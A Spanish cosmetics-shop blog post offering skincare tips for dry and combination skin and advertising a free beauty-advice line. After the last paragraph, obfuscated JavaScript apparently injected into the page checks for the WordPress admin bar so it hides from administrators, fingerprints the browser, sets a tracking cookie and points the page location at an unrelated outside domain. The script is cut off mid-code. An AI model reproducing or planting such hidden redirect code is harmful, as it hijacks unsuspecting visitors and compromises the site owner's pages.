comprar cosmética online

Con el nuevo año comienzan los nuevos propósitos, y ante los clásicos: perder unos kilos, dejar de fumar, empezar a hacer deporte, etc. os sugerimos intentar mejorar la salud de nuestra piel.

Por ello venimos con unos consejitos que seguro nos vendrán genial para mejorar nuestra piel, pero como no todas las pieles son iguales os daremos unos tips según vuestro tipo de piel.

Comenzando por pieles secas:

  • Está claro que con esto no os digo algo nuevo, pero es primordial la HIDRATACIÓN, y es que es la base de una piel seca. Si conseguimos que nuestra piel esté lo suficientemente hidratada podremos conseguir una piel radiante y no sólo con mil capas de maquillaje.
  • Siempre deberemos utilizar tratamientos específicos para nuestro tipo de piel, principalmente porque están pensadas para nuestro problema, que en general en pieles secas es la deshidratación.
  • El problema de las pieles secas es que si no están lo suficientemente hidratadas tienden a perder colágeno en la piel y a la aparición de arrugas a causa de la pérdida de la flexibilidad de la piel.
  • No utilices productos que contengan alcohol, es muy importante revisar la composición de los productos que nos aplicamos, el alcohol reseca la piel y está totalmente desaconsejado.
  • Aunque para todo tipo de pieles es importante aplicar protector solar, en pieles secas es todavía más importante protegerse del sol diariamente.

Para pieles mixtas:

  • Suele suceder que tenemos zonas grasas y zonas no tan grasas, una de las técnicas que está más en tendencia  y es por su efectividad es aplicar diferentes mascarillas según las zonas del rostro específicas, de forma que tratamos la piel para el problema de cada zona.
  • La limpieza en pieles mixtas es clave, a la hora de aplicar un limpiador (es aconsejable que sea neutro): en la zona T (barbilla, nariz y frente) aplícalo con movimientos circulares para eliminar el exceso de grasa y de forma ligera en el resto del rostro.
  • Evita retirar el limpiador facial con agua demasiado caliente ya que ello provoca que la piel produzca más sebo y se reseque, además de perjudicar la barrera natural y acelerando el proceso de envejecimiento. Lo mejor: es usar agua fría, templada o tibia.

Como sabemos que cada piel es un mundo y cada piel necesita un tratamiento específico estos son solo unos consejos en términos generales.

En Perfumes Tin Tin disponemos de un servicio de asesoramiento personalizado con nuestra consejera de belleza Tina.

Por ello os recomendamos que sin compromiso ni coste adicional nos lancéis vuestras dudas para poder ofreceros el mejor asesoramiento según vuestras necesidades.

Disponéis de dos sencillas formas de contactar con Tina: por teléfono al número gratuito 900 111 456 o a través de este formulario.

¿Qué os parece si nos proponemos para este 2016 conseguir una piel perfecta? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone